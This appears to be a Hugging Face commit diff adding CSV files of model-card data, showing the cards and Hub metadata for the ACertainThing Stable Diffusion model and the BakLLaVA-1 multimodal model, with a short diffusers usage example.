Add files using upload-large-folder tool
Browse filesThis view is limited to 50 files because it contains too many changes.
See raw diff
- ACertainThing_finetunes_20250426_221535.csv_finetunes_20250426_221535.csv +93 -0
- BakLLaVA-1_finetunes_20250426_014322.csv_finetunes_20250426_014322.csv +43 -0
- BioGPT-Large_finetunes_20250426_221535.csv_finetunes_20250426_221535.csv +181 -0
- BiomedNLP-BiomedBERT-base-uncased-abstract-fulltext_finetunes_20250426_171734.csv_finetunes_20250426_171734.csv +0 -0
- CLIP-GmP-ViT-L-14_finetunes_20250425_165642.csv_finetunes_20250425_165642.csv +127 -0
- CausalLM-14B-GGUF_finetunes_20250426_221535.csv_finetunes_20250426_221535.csv +459 -0
- ClinicalBERT_finetunes_20250426_171734.csv_finetunes_20250426_171734.csv +0 -0
- CodeLlama-7b-hf_finetunes_20250426_014322.csv_finetunes_20250426_014322.csv +0 -0
- ControlNetMediaPipeFace_finetunes_20250425_143346.csv_finetunes_20250425_143346.csv +213 -0
- DCLM-7B_finetunes_20250424_223250.csv_finetunes_20250424_223250.csv +294 -0
- GOT-OCR2_0_finetunes_20250424_193500.csv_finetunes_20250424_193500.csv +436 -0
- Ghibli-Diffusion_finetunes_20250424_223250.csv_finetunes_20250424_223250.csv +99 -0
- InternVL-Chat-V1-5_finetunes_20250426_014322.csv_finetunes_20250426_014322.csv +655 -0
- Juggernaut-XL-v9_finetunes_20250426_221535.csv_finetunes_20250426_221535.csv +69 -0
- LWM-Text-Chat-1M_finetunes_20250427_003734.csv_finetunes_20250427_003734.csv +128 -0
- Llama-2-13B-chat-GGML_finetunes_20250425_125929.csv_finetunes_20250425_125929.csv +299 -0
- Llama-3_1-Nemotron-Ultra-253B-v1_finetunes_20250426_171734.csv_finetunes_20250426_171734.csv +369 -0
- Llama3-8B-Chinese-Chat_finetunes_20250424_223250.csv_finetunes_20250424_223250.csv +0 -0
- Llama3-8B-Chinese-Chat_finetunes_20250425_125929.csv_finetunes_20250425_125929.csv +0 -0
- MiniCPM-V-2_finetunes_20250425_165642.csv_finetunes_20250425_165642.csv +390 -0
- MiniCPM-V_finetunes_20250427_003734.csv_finetunes_20250427_003734.csv +189 -0
- MistoLine_finetunes_20250425_165642.csv_finetunes_20250425_165642.csv +172 -0
- NV-Embed-v2_finetunes_20250426_014322.csv_finetunes_20250426_014322.csv +0 -0
- OpenELM_finetunes_20250424_193500.csv_finetunes_20250424_193500.csv +286 -0
- Phi-3-medium-128k-instruct_finetunes_20250426_014322.csv_finetunes_20250426_014322.csv +523 -0
- QwQ-32B-Preview_finetunes_20250424_193500.csv_finetunes_20250424_193500.csv +0 -0
- Qwen2-72B_finetunes_20250426_215237.csv_finetunes_20250426_215237.csv +0 -0
- Qwen2-7B-Instruct_finetunes_20250425_165642.csv_finetunes_20250425_165642.csv +0 -0
- ReaderLM-v2_finetunes_20250425_165642.csv_finetunes_20250425_165642.csv +305 -0
- SD-Silicon_finetunes_20250427_003734.csv_finetunes_20250427_003734.csv +90 -0
- Step-Audio-TTS-3B_finetunes_20250427_003734.csv_finetunes_20250427_003734.csv +164 -0
- Tencent-Hunyuan-Large_finetunes_20250425_143346.csv_finetunes_20250425_143346.csv +387 -0
- Tifa-Deepsex-14b-CoT-GGUF-Q4_finetunes_20250425_041137.csv_finetunes_20250425_041137.csv +217 -0
- TinyR1-32B-Preview_finetunes_20250426_121513.csv_finetunes_20250426_121513.csv +252 -0
- TripoSR_finetunes_20250425_165642.csv_finetunes_20250425_165642.csv +57 -0
- UI-TARS-7B-SFT_finetunes_20250427_003734.csv_finetunes_20250427_003734.csv +197 -0
- WanVideo_comfy_finetunes_20250425_165642.csv_finetunes_20250425_165642.csv +8 -0
- WhiteRabbitNeo-13B-v1_finetunes_20250426_014322.csv_finetunes_20250426_014322.csv +522 -0
- WizardLM-13B-Uncensored_finetunes_20250425_143346.csv_finetunes_20250425_143346.csv +239 -0
- WizardLM-2-8x22B_finetunes_20250426_014322.csv_finetunes_20250426_014322.csv +0 -0
- XTTS-v2_finetunes_20250424_150612.csv_finetunes_20250424_150612.csv +0 -0
- all-MiniLM-L12-v2_finetunes_20250426_171734.csv_finetunes_20250426_171734.csv +0 -0
- alpaca-lora-7b_finetunes_20250425_165642.csv_finetunes_20250425_165642.csv +34 -0
- blip-image-captioning-large_finetunes_20250424_223250.csv_finetunes_20250424_223250.csv +1130 -0
- bloom_finetunes_20250422_180448.csv +0 -0
- canary-1b-flash_finetunes_20250426_221535.csv_finetunes_20250426_221535.csv +641 -0
- chatgpt_paraphraser_on_T5_base_finetunes_20250426_221535.csv_finetunes_20250426_221535.csv +333 -0
- chilloutmix_finetunes_20250426_171734.csv_finetunes_20250426_171734.csv +63 -0
- deberta-v3-large_finetunes_20250426_171734.csv_finetunes_20250426_171734.csv +0 -0
- fasttext-language-identification_finetunes_20250426_171734.csv_finetunes_20250426_171734.csv +143 -0
ACertainThing_finetunes_20250426_221535.csv_finetunes_20250426_221535.csv
ADDED
|
@@ -0,0 +1,93 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
model_id,card,metadata,depth,children,children_count,adapters,adapters_count,quantized,quantized_count,merges,merges_count,spaces,spaces_count
|
| 2 |
+
JosephusCheung/ACertainThing,"---
|
| 3 |
+
language:
|
| 4 |
+
- en
|
| 5 |
+
license: creativeml-openrail-m
|
| 6 |
+
tags:
|
| 7 |
+
- stable-diffusion
|
| 8 |
+
- stable-diffusion-diffusers
|
| 9 |
+
- text-to-image
|
| 10 |
+
- diffusers
|
| 11 |
+
inference: true
|
| 12 |
+
widget:
|
| 13 |
+
- text: ""masterpiece, best quality, 1girl, brown hair, green eyes, colorful, autumn, cumulonimbus clouds, lighting, blue sky, falling leaves, garden""
|
| 14 |
+
example_title: ""example 1girl""
|
| 15 |
+
- text: ""masterpiece, best quality, 1boy, brown hair, green eyes, colorful, autumn, cumulonimbus clouds, lighting, blue sky, falling leaves, garden""
|
| 16 |
+
example_title: ""example 1boy""
|
| 17 |
+
---
|
| 18 |
+
|
| 19 |
+
# ACertainThing
|
| 20 |
+
|
| 21 |
+
**Try full functions with Google Colab free T4** [](https://colab.research.google.com/drive/1gwJViXR0UxoXx01qiU6uTSEKGjTagOgp?usp=sharing)
|
| 22 |
+
|
| 23 |
+
Anything3.0 is an overfitted model that takes liberties when it shouldn't be generating human images and certain details. However, the community has given it a high rating, and I believe that is because many lazy people who don't know how to write a prompt can use this overfitted model to generate high-quality images even if their prompts are poorly written.
|
| 24 |
+
|
| 25 |
+
Here is a ACertain version of Anything3.0, made with Dreambooth (idea of [LoRA](https://arxiv.org/abs/2106.09685) integrated), initialized with [ACertainModel](https://huggingface.co/JosephusCheung/ACertainModel).
|
| 26 |
+
|
| 27 |
+
Although this model may produce better results for image generation, it is built on two major problems. Firstly, it does not always stay true to your prompts; it adds irrelevant details, and sometimes these details are highly homogenized. Secondly, it is an unstable, overfitted model, similar to Anything3.0, and is not suitable for any form of further training. As far as I know, Anything3.0 is obtained by merging several models in just the right way, but it is itself an overfitted model with defects in both its saturation and configuration. However, as I mentioned earlier, it can make even poorly written prompts produce good output images, which leads many lazy people who are incapable of writing good prompts to quickly surpass those who study the writing of prompts carefully. Despite these problems, I still want to release an extended version of the model that caters to the preferences of many people in the community. I hope would you like it.
|
| 28 |
+
|
| 29 |
+
**In my personal view, I oppose all forms of model merging as it has no scientific principle and is nothing but a waste of time. It is a desire to get results without putting in the effort. That is why I do not like Anything3.0, or this model that is being released. But I respect the choices and preferences of the community, and I hope that you can also respect and understand my thoughts.**
|
| 30 |
+
|
| 31 |
+
If you want your prompts to be accurately output and want to learn the correct skills for using prompts, it is recommended that you use the more balanced model [ACertainModel](https://huggingface.co/JosephusCheung/ACertainModel).
|
| 32 |
+
|
| 33 |
+
e.g. **_masterpiece, best quality, 1girl, brown hair, green eyes, colorful, autumn, cumulonimbus clouds, lighting, blue sky, falling leaves, garden_**
|
| 34 |
+
|
| 35 |
+
## About online preview with Hosted inference API, also generation with this model
|
| 36 |
+
|
| 37 |
+
Parameters are not allowed to be modified, as it seems that it is generated with *Clip skip: 1*, for better performance, it is strongly recommended to use *Clip skip: 2* instead.
|
| 38 |
+
|
| 39 |
+
Here is an example of inference settings, if it is applicable with you on your own server: *Steps: 28, Sampler: Euler a, CFG scale: 11, Clip skip: 2*.
|
| 40 |
+
|
| 41 |
+
## 🧨 Diffusers
|
| 42 |
+
|
| 43 |
+
This model can be used just like any other Stable Diffusion model. For more information,
|
| 44 |
+
please have a look at the [Stable Diffusion](https://huggingface.co/docs/diffusers/api/pipelines/stable_diffusion).
|
| 45 |
+
|
| 46 |
+
You can also export the model to [ONNX](https://huggingface.co/docs/diffusers/optimization/onnx), [MPS](https://huggingface.co/docs/diffusers/optimization/mps) and/or FLAX/JAX.
|
| 47 |
+
|
| 48 |
+
```python
|
| 49 |
+
from diffusers import StableDiffusionPipeline
|
| 50 |
+
import torch
|
| 51 |
+
|
| 52 |
+
model_id = ""JosephusCheung/ACertainThing""
|
| 53 |
+
branch_name= ""main""
|
| 54 |
+
|
| 55 |
+
pipe = StableDiffusionPipeline.from_pretrained(model_id, revision=branch_name, torch_dtype=torch.float16)
|
| 56 |
+
pipe = pipe.to(""cuda"")
|
| 57 |
+
|
| 58 |
+
prompt = ""pikachu""
|
| 59 |
+
image = pipe(prompt).images[0]
|
| 60 |
+
|
| 61 |
+
image.save(""./pikachu.png"")
|
| 62 |
+
```
|
| 63 |
+
|
| 64 |
+
## Examples
|
| 65 |
+
|
| 66 |
+
Below are some examples of images generated using this model, with better performance on framing and hand gestures, as well as moving objects, comparing to other analogues:
|
| 67 |
+
|
| 68 |
+
**Anime Girl:**
|
| 69 |
+

|
| 70 |
+
```
|
| 71 |
+
1girl, brown hair, green eyes, colorful, autumn, cumulonimbus clouds, lighting, blue sky, falling leaves, garden
|
| 72 |
+
Steps: 28, Sampler: Euler a, CFG scale: 11, Seed: 114514, Clip skip: 2
|
| 73 |
+
```
|
| 74 |
+
**Anime Boy:**
|
| 75 |
+

|
| 76 |
+
```
|
| 77 |
+
1boy, brown hair, green eyes, colorful, autumn, cumulonimbus clouds, lighting, blue sky, falling leaves, garden
|
| 78 |
+
Steps: 28, Sampler: Euler a, CFG scale: 11, Seed: 114514, Clip skip: 2
|
| 79 |
+
```
|
| 80 |
+
|
| 81 |
+
## License
|
| 82 |
+
|
| 83 |
+
This model is open access and available to all, with a CreativeML OpenRAIL-M license further specifying rights and usage.
|
| 84 |
+
The CreativeML OpenRAIL License specifies:
|
| 85 |
+
|
| 86 |
+
1. You can't use the model to deliberately produce nor share illegal or harmful outputs or content
|
| 87 |
+
2. The authors claims no rights on the outputs you generate, you are free to use them and are accountable for their use which must not go against the provisions set in the license
|
| 88 |
+
3. You may re-distribute the weights and use the model commercially and/or as a service. If you do, please be aware you have to include the same use restrictions as the ones in the license and share a copy of the CreativeML OpenRAIL-M to all your users (please read the license entirely and carefully)
|
| 89 |
+
[Please read the full license here](https://huggingface.co/spaces/CompVis/stable-diffusion-license)
|
| 90 |
+
|
| 91 |
+
## Is it a NovelAI based model? What is the relationship with SD1.2 and SD1.4?
|
| 92 |
+
|
| 93 |
+
See [ASimilarityCalculatior](https://huggingface.co/JosephusCheung/ASimilarityCalculatior)","{""id"": ""JosephusCheung/ACertainThing"", ""author"": ""JosephusCheung"", ""sha"": ""f29dbc8b2737fa20287a7ded5c47973619b5c012"", ""last_modified"": ""2022-12-20 03:16:02+00:00"", ""created_at"": ""2022-12-13 18:05:27+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 530, ""downloads_all_time"": null, ""likes"": 188, ""library_name"": ""diffusers"", ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""diffusers"", ""stable-diffusion"", ""stable-diffusion-diffusers"", ""text-to-image"", ""en"", ""arxiv:2106.09685"", ""doi:10.57967/hf/0197"", ""license:creativeml-openrail-m"", ""autotrain_compatible"", ""endpoints_compatible"", ""diffusers:StableDiffusionPipeline"", ""region:us""], ""pipeline_tag"": ""text-to-image"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""language:\n- en\nlicense: creativeml-openrail-m\ntags:\n- stable-diffusion\n- stable-diffusion-diffusers\n- text-to-image\n- diffusers\ninference: true\nwidget:\n- text: masterpiece, best quality, 1girl, brown hair, green eyes, colorful, autumn,\n cumulonimbus clouds, lighting, blue sky, falling leaves, garden\n example_title: example 1girl\n- text: masterpiece, best quality, 1boy, brown hair, green eyes, colorful, autumn,\n cumulonimbus clouds, lighting, blue sky, falling leaves, garden\n example_title: example 1boy"", ""widget_data"": [{""text"": ""masterpiece, best quality, 1girl, brown hair, green eyes, colorful, autumn, cumulonimbus clouds, lighting, blue sky, falling leaves, garden"", ""example_title"": ""example 1girl""}, {""text"": ""masterpiece, best quality, 1boy, brown hair, green eyes, colorful, autumn, cumulonimbus clouds, lighting, blue sky, falling leaves, garden"", ""example_title"": ""example 1boy""}], ""model_index"": null, ""config"": {""diffusers"": {""_class_name"": ""StableDiffusionPipeline""}}, ""transformers_info"": null, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='ACertainThing-half.ckpt', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='ACertainThing.ckpt', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='feature_extractor/preprocessor_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model_index.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='safety_checker/config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='safety_checker/pytorch_model.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='samples/acth-sample-1boy.png', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='samples/acth-sample-1girl.png', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='samples/anything3-sample-1boy.png', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='samples/anything3-sample-1girl.png', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='scheduler/scheduler_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='text_encoder/config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='text_encoder/pytorch_model.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer/merges.txt', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer/special_tokens_map.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer/tokenizer_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer/vocab.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='unet/config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='unet/diffusion_pytorch_model.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='vae/config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='vae/diffusion_pytorch_model.bin', size=None, blob_id=None, lfs=None)""], ""spaces"": [""Yntec/ToyWorld"", ""Yntec/PrintingPress"", ""Nymbo/image_gen_supaqueue"", ""ennov8ion/3dart-Models"", ""phenixrhyder/NSFW-ToyWorld"", ""Yntec/blitz_diffusion"", ""sanaweb/text-to-image"", ""Vedits/6x_Image_diffusion"", ""John6666/Diffusion80XX4sg"", ""ennov8ion/comicbook-models"", ""John6666/PrintingPress4"", ""PeepDaSlan9/B2BMGMT_Diffusion60XX"", ""Daniela-C/6x_Image_diffusion"", ""phenixrhyder/PrintingPress"", ""John6666/hfd_test_nostopbutton"", ""mindtube/Diffusion50XX"", ""TheKitten/Fast-Images-Creature"", ""Nymbo/Diffusion80XX4sg"", ""kaleidoskop-hug/PrintingPress"", ""ennov8ion/stablediffusion-models"", ""John6666/ToyWorld4"", ""grzegorz2047/fast_diffusion"", ""Alfasign/dIFFU"", ""Nymbo/PrintingPress"", ""Rifd/Sdallmodels"", ""John6666/Diffusion80XX4g"", ""NativeAngels/HuggingfaceDiffusion"", ""ennov8ion/Scifi-Models"", ""ennov8ion/semirealistic-models"", ""ennov8ion/dreamlike-models"", ""ennov8ion/FantasyArt-Models"", ""noes14155/img_All_models"", ""ennov8ion/500models"", ""AnimeStudio/anime-models"", ""John6666/Diffusion80XX4"", ""K00B404/HuggingfaceDiffusion_custom"", ""John6666/blitz_diffusion4"", ""John6666/blitz_diffusion_builtin"", ""RhythmRemix14/PrintingPressDx"", ""sohoso/PrintingPress"", ""NativeAngels/ToyWorld"", ""mindtube/maximum_multiplier_places"", ""animeartstudio/AnimeArtmodels2"", ""animeartstudio/AnimeModels"", ""Binettebob22/fast_diffusion2"", ""pikto/Elite-Scifi-Models"", ""PixelistStudio/3dart-Models"", ""devmiles/zexxiai"", ""Nymbo/Diffusion60XX"", ""TheKitten/Images"", ""ennov8ion/anime-models"", ""jordonpeter01/Diffusion70"", ""ennov8ion/Landscapes-models"", ""sohoso/anime348756"", ""ucmisanddisinfo/thisApp"", ""johann22/chat-diffusion"", ""K00B404/generate_many_models"", ""manivannan7gp/Words2Image"", ""ennov8ion/art-models"", ""ennov8ion/photo-models"", ""ennov8ion/art-multi"", ""vih-v/x_mod"", ""NativeAngels/blitz_diffusion"", ""NativeAngels/PrintingPress4"", ""NativeAngels/PrintingPress"", ""dehua68/ToyWorld"", ""burman-ai/Printing-Press"", ""sk16er/ghibli_creator"", ""sheldon/JosephusCheung-ACertainThing"", ""vanessa9178/AI-Generator"", ""ennov8ion/abstractart-models"", ""ennov8ion/Scifiart-Models"", ""ennov8ion/interior-models"", ""ennov8ion/room-interior-models"", ""animeartstudio/AnimeArtModels1"", ""Yntec/top_100_diffusion"", ""AIlexDev/Diffusion60XX"", ""flatindo/all-models"", ""flatindo/all-models-v1"", ""flatindo/img_All_models"", ""johann22/chat-diffusion-describe"", ""wideprism/Ultimate-Model-Collection"", ""GAIneZis/FantasyArt-Models"", ""TheMaisk/Einfach.ImageAI"", ""ennov8ion/picasso-diffusion"", ""K00B404/stablediffusion-portal"", ""ennov8ion/anime-new-models"", ""ennov8ion/anime-multi-new-models"", ""ennov8ion/photo-multi"", ""ennov8ion/anime-multi"", ""Ashrafb/comicbook-models"", ""sohoso/architecture"", ""K00B404/image_gen_supaqueue_game_assets"", ""GhadaSaylami/text-to-image"", ""Geek7/mdztxi"", ""Geek7/mdztxi2"", ""NativeAngels/Diffusion80XX4sg"", ""GandalfTheBlack/PrintingPressDx"", ""GandalfTheBlack/IMG2IMG-695models"", ""tejani/PrintingPress""], ""safetensors"": null, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2022-12-20 03:16:02+00:00"", ""cardData"": ""language:\n- en\nlicense: creativeml-openrail-m\ntags:\n- stable-diffusion\n- stable-diffusion-diffusers\n- text-to-image\n- diffusers\ninference: true\nwidget:\n- text: masterpiece, best quality, 1girl, brown hair, green eyes, colorful, autumn,\n cumulonimbus clouds, lighting, blue sky, falling leaves, garden\n example_title: example 1girl\n- text: masterpiece, best quality, 1boy, brown hair, green eyes, colorful, autumn,\n cumulonimbus clouds, lighting, blue sky, falling leaves, garden\n example_title: example 1boy"", ""transformersInfo"": null, ""_id"": ""6398bee79d84601abcd5f0fb"", ""modelId"": ""JosephusCheung/ACertainThing"", ""usedStorage"": 12711483823}",0,,0,,0,,0,,0,"CompVis/stable-diffusion-license, Daniela-C/6x_Image_diffusion, John6666/Diffusion80XX4sg, John6666/PrintingPress4, John6666/ToyWorld4, John6666/hfd_test_nostopbutton, Nymbo/image_gen_supaqueue, PeepDaSlan9/B2BMGMT_Diffusion60XX, Yntec/PrintingPress, Yntec/ToyWorld, Yntec/blitz_diffusion, huggingface/InferenceSupport/discussions/new?title=JosephusCheung/ACertainThing&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5BJosephusCheung%2FACertainThing%5D(%2FJosephusCheung%2FACertainThing)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A, kaleidoskop-hug/PrintingPress, phenixrhyder/NSFW-ToyWorld",14
|
BakLLaVA-1_finetunes_20250426_014322.csv_finetunes_20250426_014322.csv
ADDED
|
@@ -0,0 +1,43 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
model_id,card,metadata,depth,children,children_count,adapters,adapters_count,quantized,quantized_count,merges,merges_count,spaces,spaces_count
|
| 2 |
+
SkunkworksAI/BakLLaVA-1,"---
|
| 3 |
+
datasets:
|
| 4 |
+
- SkunkworksAI/BakLLaVA-1-FT
|
| 5 |
+
language:
|
| 6 |
+
- en
|
| 7 |
+
license: apache-2.0
|
| 8 |
+
---
|
| 9 |
+
|
| 10 |
+
<p><h1> BakLLaVA-1 </h1></p>
|
| 11 |
+
|
| 12 |
+
Thank you to our compute sponsors Together Compute (www.together.ai).
|
| 13 |
+
In collaboration with **Ontocord** (www.ontocord.ai) and **LAION** (www.laion.ai).
|
| 14 |
+
|
| 15 |
+
|
| 16 |
+

|
| 17 |
+
|
| 18 |
+
BakLLaVA 1 is a Mistral 7B base augmented with the LLaVA 1.5 architecture. In this first version, we showcase that a Mistral 7B base outperforms Llama 2 13B on several benchmarks.
|
| 19 |
+
You can run BakLLaVA-1 on our repo. We are currently updating it to make it easier for you to finetune and inference. (https://github.com/SkunkworksAI/BakLLaVA).
|
| 20 |
+
|
| 21 |
+
|
| 22 |
+
Note: BakLLaVA-1 is fully open-source but was trained on certain data that includes LLaVA's corpus which is not commercially permissive. We will fix this in the upcoming release.
|
| 23 |
+
|
| 24 |
+
|
| 25 |
+
BakLLaVA 2 is cooking with a significantly larger (commercially viable) dataset and a novel architecture that expands beyond the current LLaVA method. BakLLaVA-2 will do away with the restrictions of BakLLaVA-1.
|
| 26 |
+
|
| 27 |
+
|
| 28 |
+
# Evaluations
|
| 29 |
+
|
| 30 |
+
|
| 31 |
+

|
| 32 |
+
|
| 33 |
+
# Training dataset
|
| 34 |
+
|
| 35 |
+
- 558K filtered image-text pairs from LAION/CC/SBU, captioned by BLIP.
|
| 36 |
+
- 158K GPT-generated multimodal instruction-following data.
|
| 37 |
+
- 450K academic-task-oriented VQA data mixture.
|
| 38 |
+
- 40K ShareGPT data.
|
| 39 |
+
- Additional private data (permissive)
|
| 40 |
+
|
| 41 |
+
|
| 42 |
+
|
| 43 |
+
","{""id"": ""SkunkworksAI/BakLLaVA-1"", ""author"": ""SkunkworksAI"", ""sha"": ""d8e5fd9f1c8d021bdb9a1108b72d4bca8c32d61f"", ""last_modified"": ""2023-10-23 21:26:30+00:00"", ""created_at"": ""2023-10-12 13:12:21+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 133, ""downloads_all_time"": null, ""likes"": 379, ""library_name"": ""transformers"", ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""transformers"", ""pytorch"", ""llava_mistral"", ""text-generation"", ""en"", ""dataset:SkunkworksAI/BakLLaVA-1-FT"", ""license:apache-2.0"", ""autotrain_compatible"", ""endpoints_compatible"", ""region:us""], ""pipeline_tag"": ""text-generation"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""datasets:\n- SkunkworksAI/BakLLaVA-1-FT\nlanguage:\n- en\nlicense: apache-2.0"", ""widget_data"": [{""text"": ""My name is Julien and I like to""}, {""text"": ""I like traveling by train because""}, {""text"": ""Paris is an amazing place to visit,""}, {""text"": ""Once upon a time,""}], ""model_index"": null, ""config"": {""architectures"": [""LlavaMistralForCausalLM""], ""model_type"": ""llava_mistral"", ""tokenizer_config"": {""bos_token"": ""<s>"", ""eos_token"": ""</s>"", ""pad_token"": ""<unk>"", ""unk_token"": ""<unk>"", ""use_default_system_prompt"": true}}, ""transformers_info"": {""auto_model"": ""AutoModelForCausalLM"", ""custom_class"": null, ""pipeline_tag"": ""text-generation"", ""processor"": null}, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='added_tokens.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='generation_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='pytorch_model-00001-of-00002.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='pytorch_model-00002-of-00002.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='pytorch_model.bin.index.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='special_tokens_map.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer.model', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer_config.json', size=None, blob_id=None, lfs=None)""], ""spaces"": [""limcheekin/BakLLaVA-1-GGUF"", ""QuantAsh/SkunkworksAI-BakLLaVA-1"", ""QuantAsh/SkunkworksAI-BakLLaVA-2"", ""SengTak/SkunkworksAI-BakLLaVA-1"", ""jasongoodison/SkunkworksAI-BakLLaVA-1"", ""scasella91/SkunkworksAI-BakLLaVA-1"", ""jerrybaba/moai-demo"", ""Meysam1986/SkunkworksAI-BakLLaVA-1"", ""jaemil/SkunkworksAI-BakLLaVA-1""], ""safetensors"": null, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2023-10-23 21:26:30+00:00"", ""cardData"": ""datasets:\n- SkunkworksAI/BakLLaVA-1-FT\nlanguage:\n- en\nlicense: apache-2.0"", ""transformersInfo"": {""auto_model"": ""AutoModelForCausalLM"", ""custom_class"": null, ""pipeline_tag"": ""text-generation"", ""processor"": null}, ""_id"": ""6527f0b551d1165df6760e12"", ""modelId"": ""SkunkworksAI/BakLLaVA-1"", ""usedStorage"": 196792796145}",0,,0,,0,,0,,0,"Meysam1986/SkunkworksAI-BakLLaVA-1, QuantAsh/SkunkworksAI-BakLLaVA-1, QuantAsh/SkunkworksAI-BakLLaVA-2, SengTak/SkunkworksAI-BakLLaVA-1, huggingface/InferenceSupport/discussions/new?title=SkunkworksAI/BakLLaVA-1&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5BSkunkworksAI%2FBakLLaVA-1%5D(%2FSkunkworksAI%2FBakLLaVA-1)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A, jaemil/SkunkworksAI-BakLLaVA-1, jasongoodison/SkunkworksAI-BakLLaVA-1, jerrybaba/moai-demo, limcheekin/BakLLaVA-1-GGUF, scasella91/SkunkworksAI-BakLLaVA-1",10
|
BioGPT-Large_finetunes_20250426_221535.csv_finetunes_20250426_221535.csv
ADDED
|
@@ -0,0 +1,181 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
